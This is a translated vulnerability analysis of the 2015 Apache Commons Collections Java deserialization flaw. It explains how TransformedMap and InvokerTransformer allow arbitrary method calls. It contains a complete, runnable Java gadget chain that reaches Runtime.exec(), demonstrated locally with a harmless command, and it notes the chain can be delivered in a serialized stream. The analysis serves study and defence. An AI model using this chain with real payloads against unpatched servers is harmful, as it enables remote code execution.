In-depth analysis of the Commons Collections Java deserialization vulnerability - vulnerability alert - myhack58 (黑吧安全网)

ID MYHACK58:62201569493
Type myhack58
Reporter 深夜饮酒
Modified 2015-11-28T00:00:00


0x01 Background

The Java vulnerability with the greatest impact so far this year is, without doubt, the Commons Collections deserialization vulnerability that has been blazing for the past few weeks.

On November 6, 2015, @breenmachine of the FoxGlove Security team published a lengthy blog post that brought Java deserialization, and in particular a real-world case of remote command execution via the Apache Commons Collections base class library, into public view. Every major Java web server took a hit: the vulnerability swept across the then-latest versions of WebLogic, WebSphere, JBoss, Jenkins and OpenNMS. Yet almost ten months earlier, Gabriel Lawrence and Chris Frohoff had already described the idea behind this exploit in a talk at AppSecCali.

At present, the affected Java application vendors have released fixed versions for this "most underrated vulnerability of 2015", and the Apache Commons Collections project has itself added some protective handling to the class library in which the vulnerability lives.

0x02 Starting with Apache Commons Collections

Apache Commons Collections is a third-party foundation library that extends the Collection framework of the Java standard library; it provides many powerful data structure types and implements a variety of collection utilities. As an important component of the Apache open source projects, Commons Collections is widely used in all kinds of Java application development.

Commons Collections implements a TransformedMap class, an extension of the Map interface from the Java standard library. When an element is added to the collection, the class automatically applies a specific transformation to that element. The transformation logic is defined by a Transformer (an interface the library defines), and the Transformer is passed in as an argument when the TransformedMap is instantiated.

A TransformedMap instance is obtained through the static TransformedMap.decorate() method, which takes the underlying Map to wrap together with a key Transformer and a value Transformer (either of which may be null).

Whenever a key or value inside the TransformedMap changes, the corresponding Transformer's transform() method is triggered. In addition, an array of Transformers can be wrapped in a ChainedTransformer; when triggered, the ChainedTransformer calls the transformations in sequence, feeding the output of each step into the next. Apache Commons Collections also ships a number of commonly used Transformers, and among them the InvokerTransformer class is today's protagonist.

Its transform() method is the key piece.

transform(Object input) uses the Java reflection mechanism to call a method on the input object. The method name is the iMethodName member variable that was passed in when the InvokerTransformer was instantiated; the parameter types and arguments (iParamTypes and iArgs) are likewise supplied at construction time, so the call amounts to input.getClass().getMethod(iMethodName, iParamTypes).invoke(input, iArgs).


That is, in this piece of reflection code both the name of the method being invoked and the Class object it is resolved against are under our control. We can therefore construct a malicious Transformer chain and, by way of InvokerTransformer.transform(), execute an arbitrary command.
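The following is an added example written for this page, not the test code from the original post. It builds the chain described above and fires it locally through TransformedMap.put(); it assumes commons-collections 3.1 (or 3.2.1) on the classpath and a Unix-like host, and the `touch` command is a constructed, harmless stand-in for whatever an attacker would run:

```java
// Added example (not code from the original post): a malicious Transformer chain
// that drives InvokerTransformer.transform() through reflection until it reaches
// Runtime.exec(). Assumes commons-collections 3.1 or 3.2.1 on the classpath.
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

public class TransformerChainPoc {

    // Each InvokerTransformer performs, in effect,
    //   input.getClass().getMethod(iMethodName, iParamTypes).invoke(input, iArgs)
    // so the result of one step becomes the input (and hence the Class) of the next.
    static Transformer buildChain(String command) {
        Transformer[] steps = new Transformer[] {
            // 1. Ignore the real input and hand java.lang.Runtime.class to the next step.
            new ConstantTransformer(Runtime.class),
            // 2. Runtime.class.getMethod("getRuntime", new Class[0])  -> Method getRuntime
            new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "getRuntime", new Class[0] }),
            // 3. getRuntime.invoke(null, new Object[0])               -> Runtime instance
            new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),
            // 4. runtime.exec(command)                                -> Process
            new InvokerTransformer("exec",
                new Class[] { String.class },
                new Object[] { command })
        };
        return new ChainedTransformer(steps);
    }

    public static void main(String[] args) {
        // Constructed, harmless command for the demo (assumption: Unix-like host).
        Transformer chain = buildChain("touch /tmp/commons-collections-poc");

        // Raw types match the commons-collections 3.x API, which predates generics.
        Map innerMap = new HashMap();
        // Decorate the map: no key transformer, our chain as the value transformer.
        Map outerMap = TransformedMap.decorate(innerMap, null, chain);

        // put() is the trigger: TransformedMap transforms the value before storing it,
        // which walks the whole chain and ends in Runtime.exec(). No deserialization is
        // involved here; this only demonstrates the local gadget.
        outerMap.put("key", "value");
        System.out.println("chain fired; stored value: " + innerMap.get("key"));
    }
}
```

Compile and run with the commons-collections jar on the classpath and check that /tmp/commons-collections-poc appears. The interesting property is that nothing in this class is attacker-specific: every object in the chain is an ordinary, serializable library class, which is what later allows the same chain to be delivered inside a serialized stream instead of being built in code.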


In such a chain, ConstantTransformer, as the name suggests, ignores whatever object it is handed and returns the constant it was constructed with; it is what places the Runtime class at the head of the chain. Its transform() method simply returns the stored iConstant field.

